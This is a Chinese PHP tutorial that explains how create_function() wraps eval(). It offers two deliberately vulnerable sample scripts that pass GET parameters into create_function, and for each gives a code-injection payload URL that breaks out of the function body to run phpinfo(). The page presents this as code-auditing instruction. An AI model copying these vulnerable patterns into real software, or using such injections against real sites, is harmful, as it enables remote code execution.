PHP create_function()函數(shù)應(yīng)用實例詳解
前言
一直遇到過這個 函數(shù),但是不知道怎么利用 這回學(xué)習(xí)一下這個函數(shù)
create_function()簡介
適用 PHP4>4.0.1 PHP 5 PHP7
語法:
create_function(string $args, string $code)
string $args 聲明的函數(shù)變量部分
string $code 執(zhí)行的方法代碼部分
函數(shù)功能
<?php
$newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);');
echo "New anonymous function: $newfunc\n";
echo $newfunc(2, M_E) . "\n";
?>
分析:
create_function() 會創(chuàng)造一個匿名函數(shù) (lambda樣式) 此處創(chuàng)建了一個叫 lamvda_1 的函數(shù), 在第一個 echo 中 顯示名字, 并在第二個echo 語句中執(zhí)行了 此函數(shù)。
create_function() 函數(shù) 會在內(nèi)部 執(zhí)行 eval() , 我們發(fā)現(xiàn)是執(zhí)行了 后面的 return 語句,屬于create_function() 中的第二個參數(shù) string $code 的位置
因此,上述匿名函數(shù)的創(chuàng)建與執(zhí)行過程等價于:
<?php
function lambda_1($a,$b){
return "ln($a) + ln($b) = " . log($a * $b);
}
?>create_function( ) 函數(shù)在代碼審計中,主要用來查找項目中的代碼注入和回調(diào)后門的情況,熟悉了執(zhí)行流程, 可以實現(xiàn)對代碼注入的 payload 構(gòu)造,從而 進行漏洞挖掘和找出存在缺陷
代碼注入實例
0x01
<?php
error_reporting(0);
$sort_by = $_GET['sort_by'];
$sorter = 'strnatcasecmp';
$databases=array('1234','4321');
$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);';
usort($databases, create_function('$a, $b', $sort_function));
?>payload:
http://localhost/test1.php?sort_by=%27%22]);}phpinfo();/*

還原實際的組合過程:
$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by '"]);}phpinfo();/*
匿名函數(shù)實際的執(zhí)行:
function niming($a,$b){
return 1 * ' . $sorter . '($a["' . $sort_by '"]);}phpinfo();/*
}$sort_by 是我們傳入的值。
回車換行整理一下:
function niming($a,$b){
return 1 * ' . $sorter . '($a["' . $sort_by '"]);
}
phpinfo();/*
}0x02
<?php
$c=$_GET['c'];
$lambda=create_function('$a,$b',"return (strlen($a)-strlen($b)+" . "strlen($c));");
$array=array('reall long string here,boy','this','midding lenth','larget');
usort($array,$lambda);
print_r($array);
?>payload:
http://localhost/test2.php?c=1));}phpinfo();/*

還原實際的組合過程:
$lambda=create_function('$a,$b',"return (strlen($a)-strlen($b)+" . "strlen(1));}phpinfo();/*));");匿名函數(shù)實際的執(zhí)行:
function ft($a,$b){
return (strlen($a)-strlen($b)+" . "strlen(1));}phpinfo();/*));
}換行整理:
function ft($a,$b){
return (strlen($a)-strlen($b)+" . "strlen(1));
}
phpinfo();
/*));
}到此這篇關(guān)于PHP create_function()函數(shù)應(yīng)用實例詳解的文章就介紹到這了,更多相關(guān)PHP create_function()函數(shù)內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!
相關(guān)文章
Sorting Array Values in PHP(數(shù)組排序)
有時候,你可能需要對數(shù)組內(nèi)的值進行排序,那么就可以參考下面的文章。2011-09-09
WordPress中給媒體文件添加分類和標(biāo)簽的PHP功能實現(xiàn)
這篇文章主要介紹了WordPress中給媒體文件添加分類和標(biāo)簽的PHP功能實現(xiàn),同時文中也提到了Media Library Categories這個插件同樣可以達到目的,需要的朋友可以參考下2015-12-12
淺析php靜態(tài)方法與非靜態(tài)方法的用法區(qū)別
下面小編就為大家?guī)硪黄獪\析php靜態(tài)方法與非靜態(tài)方法的用法區(qū)別。小編覺得挺不錯的,現(xiàn)在就分享給大家,也給大家做個參考。一起跟隨小編過來看看吧2016-05-05
遞歸實現(xiàn)php數(shù)組轉(zhuǎn)xml的代碼分享
本文以實例形式講述了PHP實現(xiàn)數(shù)組遞歸轉(zhuǎn)義的方法,分享給大家供大家參考之用。具體方法如下:2015-05-05

